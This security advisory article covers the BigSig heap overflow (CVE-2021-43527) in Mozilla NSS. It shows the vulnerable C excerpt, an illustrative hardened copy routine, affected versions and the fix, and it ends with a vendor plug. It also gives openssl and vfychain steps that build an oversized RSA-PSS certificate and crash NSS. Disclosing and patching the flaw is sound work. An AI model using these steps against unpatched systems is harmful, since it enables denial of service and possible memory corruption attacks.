Mozilla Fixes Critical Vulnerability In Cryptographic Libraries

Mozilla has recently fixed a critical memory corruption vulnerability affecting its cross-platform Network Security Services (NSS) set of cryptographic libraries.

Network Security Services (NSS) is an open-source implementation of the crypto libraries used by AOL, Red Hat, Google, and other companies to support cross-platform development of security-enabled client and server applications. Applications using NSS support many network security standards like SSL v3, TLS, PKCS #5, PKCS #7, PKCS #11, PKCS #12, S/MIME, and X.509 v3 certificates.

The flaw was discovered and reported by Google’s Project Zero member Tavis Ormandy, who dubbed the vulnerability BigSig. It has since been tracked as CVE-2021-43527.

The security vulnerability exists in the way NSS handles DER-encoded DSA or RSA-PSS signatures, leading to a heap overflow. When a DSA or RSA-PSS digital signature encoded using the DER binary format is verified, the length of the signature is never checked against the size of the fixed-size buffer it is copied into. “sig and key are arbitrary-length, attacker-controlled blobs,” as Ormandy put it. “The untrusted signature is simply copied into this fixed-sized buffer, overwriting adjacent members with arbitrary attacker-controlled data.”

The vulnerable part of the code for RSA-PSS is given below (the braces and break statements dropped from the excerpt are restored). Note that sigLen is compared against sig->len, but never against the size of cx->u.buffer:

        case rsaPssKey:
            sigLen = SECKEY_SignatureLen(key);   /* length implied by the (attacker-supplied) key */
            if (sigLen == 0) {
                /* error set by SECKEY_SignatureLen */
                rv = SECFailure;
                break;
            }
            if (sig->len != sigLen) {
                rv = SECFailure;
                break;
            }
            /* no check that sigLen fits in the fixed-size cx->u.buffer */
            PORT_Memcpy(cx->u.buffer, sig->data, sigLen);
            break;

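The missing check, shown as an added illustration in C rather than NSS code: a simplified stand-in for the verification context (the struct layout, the 2048-byte buffer size taken from the article's 16384-bit figure, and all function names are assumptions, not NSS's) with the copy routine in its vulnerable form beside a hardened form that rejects any signature larger than the destination buffer before copying.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed, simplified stand-in for the NSS verification context.
 * The real NSS struct differs; only the shape matters here: a fixed-size
 * signature buffer followed by members that an overflow would clobber. */
#define SIG_BUFFER_BYTES 2048 /* 16384 bits, the figure quoted in the article */

typedef struct {
    unsigned char buffer[SIG_BUFFER_BYTES];
    void *hashobj; /* stand-in for the adjacent member the write-up names */
} SigContext;

/* Minimal stand-in for a SECItem: pointer plus length. */
typedef struct {
    const unsigned char *data;
    size_t len;
} SigItem;

/* Vulnerable shape (assumed, mirrors the excerpt): key_sig_len plays the role
 * of SECKEY_SignatureLen(key). It is checked against sig->len but never
 * against sizeof(cx->buffer), so an oversized key drives an oversized copy.
 * Kept only for comparison; it is never called with oversized input here. */
int copy_signature_vulnerable(SigContext *cx, const SigItem *sig, size_t key_sig_len)
{
    if (key_sig_len == 0)
        return -1;
    if (sig->len != key_sig_len)
        return -1;
    memcpy(cx->buffer, sig->data, key_sig_len); /* unbounded by buffer size */
    return 0;
}

/* Hardened shape: bound the copy by the destination before touching memory. */
int copy_signature_fixed(SigContext *cx, const SigItem *sig, size_t key_sig_len)
{
    if (key_sig_len == 0)
        return -1;
    if (key_sig_len > sizeof(cx->buffer)) /* the check the excerpt lacks */
        return -1;
    if (sig->len != key_sig_len)
        return -1;
    memcpy(cx->buffer, sig->data, key_sig_len);
    return 0;
}

/* Does a key of key_bits produce a signature that fits the fixed buffer?
 * Returns 1 if it fits, 0 if it would overflow. */
int signature_fits_buffer(size_t key_bits)
{
    return (key_bits + 7) / 8 <= SIG_BUFFER_BYTES;
}

/* Drive the hardened routine with a constructed signature blob of sig_bytes
 * bytes (filler content; not a real signature). Returns the routine's result. */
int verify_sample_signature(size_t sig_bytes)
{
    static unsigned char blob[4096]; /* constructed input, large enough for the demo */
    SigContext cx;
    SigItem sig = { blob, sig_bytes };

    if (sig_bytes > sizeof(blob))
        return -1;
    memset(blob, 0xAA, sig_bytes);
    memset(&cx, 0, sizeof(cx));
    return copy_signature_fixed(&cx, &sig, sig_bytes);
}

int main(void)
{
    size_t fits = 16384;
    size_t overflow = 16384 + 32 + 64 + 64 + 64; /* the article's key size */

    printf("%zu-bit key fits: %d\n", fits, signature_fits_buffer(fits));
    printf("%zu-bit key fits: %d\n", overflow, signature_fits_buffer(overflow));
    printf("2048-byte signature accepted: %d\n", verify_sample_signature(2048) == 0);
    printf("2076-byte signature rejected: %d\n", verify_sample_signature(2076) == -1);
    return 0;
}
```

The hardened routine returns failure for the 2076-byte signature that the article's 16608-bit key would produce, while a 2048-byte signature that exactly fills the buffer is still accepted; the ordering matters, since the size check must run before the memcpy rather than after it.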

The steps to reproduce as given by Ormandy are:

  • We need 16384 bits to fill the buffer, then 32 + 64 + 64 + 64 bits to overflow to hashobj.
    $ openssl genpkey -algorithm rsa-pss -pkeyopt rsa_keygen_bits:$((16384 + 32 + 64 + 64 + 64)) -pkeyopt rsa_keygen_primes:5 -out bigsig.key
  • Generate a self-signed certificate from that key
    $ openssl req -x509 -new -key bigsig.key -subj "/CN=BigSig" -sha256 -out bigsig.cer
  • Verify it with NSS
    $ vfychain -a bigsig.cer
    Segmentation fault

Ormandy has also published a detailed write-up of the vulnerability, available here.

Affected Versions

  • NSS versions before 3.73
  • NSS ESR versions before 3.68.1

Applications using NSS for handling signatures encoded within CMS, S/MIME, PKCS #7, or PKCS #12 are likely to be impacted. Applications using NSS for certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted, depending on how they configure NSS.

Mozilla Security Advisory

Mozilla also added a note stating that this vulnerability does not impact Mozilla Firefox. Email clients and PDF viewers that use NSS for signature verification, such as Thunderbird, LibreOffice, Evolution, and Evince, are believed to be impacted.
Mozilla has patched this vulnerability in NSS 3.73.0. Vendors that distribute NSS in their products are advised to update or backport the patch.

SanerNow VM and SanerNow PM detect this vulnerability and automatically fix it by applying security updates. Use SanerNow and keep your systems updated and secure.